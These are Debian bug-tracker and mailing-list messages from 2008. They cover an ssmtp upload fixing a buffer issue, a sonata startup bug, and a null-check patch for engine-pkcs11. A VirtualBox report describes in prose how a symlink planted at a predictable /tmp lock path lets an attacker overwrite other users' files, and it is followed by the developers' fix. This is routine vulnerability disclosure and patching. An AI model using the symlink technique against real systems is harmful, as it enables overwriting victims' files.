archive: ssmtp_2.62-2.1.diff.gz to pool/main/s/ssmtp/ssmtp_2.62-2.1.diff.gz ssmtp_2.62-2.1.dsc to pool/main/s/ssmtp/ssmtp_2.62-2.1.dsc ssmtp_2.62-2.1_i386.deb to pool/main/s/ssmtp/ssmtp_2.62-2.1_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Kari Pahula <[EMAIL PROTECTED]> (supplier of updated ssmtp package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Tue, 04 Nov 2008 15:11:15 +0200 Source: ssmtp Binary: ssmtp Architecture: source i386 Version: 2.62-2.1 Distribution: unstable Urgency: low Maintainer: Anibal Monsalve Salazar <[EMAIL PROTECTED]> Changed-By: Kari Pahula <[EMAIL PROTECTED]> Description: ssmtp - extremely simple MTA to get mail off the system to a mail hub Closes: 345780 Changes: ssmtp (2.62-2.1) unstable; urgency=low . * NMU. * Only double leading dots at line start and don't overexpand buffer in standardise(). Don't add extra "\r\n" endings in between lines over BUF_SZ bytes long. Closes: #345780 Checksums-Sha1: 321541b7cf2d09c638f3823dcec396cb85dff1b7 1091 ssmtp_2.62-2.1.dsc 177c4986bee2d227926d1a5ec9b01487fa89c376 32342 ssmtp_2.62-2.1.diff.gz e06b1a8a452cf6f3b6486c54102aef6db3486b2c 49338 ssmtp_2.62-2.1_i386.deb Checksums-Sha256: 5ee5d4b9ff70097e74b70eb2fe4a2be079168e5cdfc05cc3bd6afcefcd176ace 1091 ssmtp_2.62-2.1.dsc 9ac50a74ce930393edc23b31b911b2970e59a477dac8dac6c3204db8bf5dc57c 32342 ssmtp_2.62-2.1.diff.gz 1594164744f8bf7ebc9d8a91118ecc30eeeb1eeb6e3fed70f7c0e8c429be4888 49338 ssmtp_2.62-2.1_i386.deb Files: c0b067a0f6cc617a21986d8f99d9f4eb 1091 mail extra ssmtp_2.62-2.1.dsc 1eb2b91bb61872362120786c5bb0604b 32342 mail extra ssmtp_2.62-2.1.diff.gz 841e94422c895f92b229087fce25c492 49338 mail extra ssmtp_2.62-2.1_i386.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkkRYEgACgkQeYl9593Atw2ZXQCeKgAu30FknJA5oMktw8e+xCB1 r8kAmwcl4ZoiqqzKUeQ2VzeJBmR1SXiT =D9vW -END PGP SIGNATURE- --- End Message ---
Bug#504149: [Pkg-virtualbox-devel] Bug#504149: virtualbox-ose: symlink vulnerability due to bad /tmp handling
Paul et all, On Saturday 01 November 2008, Paul Wise wrote: > By creating a symlink /tmp/.vbox-$USER-ipc/lock an attacker can > overwrite any file owned by any user who starts virtualbox. Starting and > then exiting virtualbox is enough to trigger this, you don't need to > start any virtual machines. Thanks for this report. > In addition to this, it is a really stupid idea to put dotfiles in /tmp > and this should be fixed too. I'm not sure if this is stupid or not. At least the .vbox-* directories are not the only .dotfile directories in /tmp. > In addition to this, virtualbox does not clean up /tmp/.vbox-$USER-ipc/ > when exiting, which is just rude. We will fix that later. I hope our fix is sufficient. The changesets r13788, r13807, r13809, r13810 should check the permissions. These changesets should apply to 1.6.6 and 2.0 as well. Kind regards, Frank -- Dr.-Ing. Frank MehnertSun Microsystemshttp://www.sun.com/ signature.asc Description: This is a digitally signed message part.
Bug#504573: sonata: Sonata fails to start after python upgrade.
Package: sonata Version: 1.5.2-2 Severity: grave Justification: renders package unusable after python upgrade to version 2.5 sonata fails to start. I've to launch dpkg-reconfigure for all libraries used by sonata to resolve this problem. -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.27-endor Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages sonata depends on: ii python2.5.2-2An interactive high-level object-o ii python-central0.6.8 register and build utility for Pyt ii python-dbus 0.82.4-2 simple interprocess messaging syst ii python-gtk2 2.12.1-6 Python bindings for the GTK+ widge ii python-mpd0.2.0-2Python MPD client library Versions of packages sonata recommends: ii python-eggtrayicon2.19.1-3 Python module to display icons in ii python-elementtree1.2.6-12 Light-weight toolkit for XML proce ii python-mmkeys 1.5.2-2Multimedia key support as a PyGTK ii python-tagpy 0.94.5-2 Python module for manipulating tag ii python-zsi2.1~a1-2 Zolera Soap Infrastructure sonata suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503298: libengine-pkcs11-openssl: engine-pkcs11-0.1.4 fails in get_pin
* Cyril Brulebois ([EMAIL PROTECTED]) wrote:
> tag 503298 patch
> thanks
>
> Aron Griffis <[EMAIL PROTECTED]> (24/10/2008):
> > I reported this bug upstream over a year ago and it was finally fixed.
>
> Thanks for having done so. Could you please grab the source package,
> apply the attached patch, build it, and confirm it works fine for you?
> I'm no such medium to check by myself.
>
> Eric, would you like me to NMU it to fix this RC bug? If you prefer, you
> can of course scratch the NMU line, adjust the version and the trailer
> line and upload it yourself.
Thanks Cyril, I'll upload it tomorrow, no need to NMU.
> Some remarks:
> - I included the diff w/o any patch management system to keep the
>changes minimal (I could have used quilt otherwise).
> - I didn't use simple-patchsys.mk either, since it would have
>introduced a failure to build twice in a row, see #414305/#494254.
> - debian/rules should be including the rules include after all other
>class includes. But since no related bug got reported, I'm not
>touching that either.
> - I'm not bumping urgency so that it gets some bits of testing in
>unstable before having a chance to migrate.
>
> Hope this helps.
>
> Mraw,
> KiBi.
> diff -u engine-pkcs11-0.1.4/debian/changelog
> engine-pkcs11-0.1.4/debian/changelog
> --- engine-pkcs11-0.1.4/debian/changelog
> +++ engine-pkcs11-0.1.4/debian/changelog
> @@ -1,3 +1,14 @@
> +engine-pkcs11 (0.1.4-1.1) unstable; urgency=low
> +
> + * Non-maintainer upload.
> + * Backport revision 110 (upstream ticket #11) to fix failure to ask a
> +PIN, often rendering the smartcard locked: check for mycb not being
> +NULL before trying to dereference it, in src/engine_pkcs11.c's
> +get_pin(). Thanks to Aron Griffis for both Debian and upstream bug
> +reports (Closes: #503298).
> +
> + -- Cyril Brulebois <[EMAIL PROTECTED]> Tue, 04 Nov 2008 01:26:45 +0100
> +
> engine-pkcs11 (0.1.4-1) unstable; urgency=low
>
>* New upstream release.
> only in patch2:
> unchanged:
> --- engine-pkcs11-0.1.4.orig/src/engine_pkcs11.c
> +++ engine-pkcs11-0.1.4/src/engine_pkcs11.c
> @@ -105,7 +105,7 @@
> const char *prompt_info;
> } *mycb = callback_data;
>
> - if (mycb->password) {
> + if (mycb != NULL && mycb->password) {
> sc_pin = set_pin(mycb->password);
> return sc_pin;
> }
--
Eric Dorland <[EMAIL PROTECTED]>
ICQ: #61138586, Jabber: [EMAIL PROTECTED]
signature.asc
Description: Digital signature
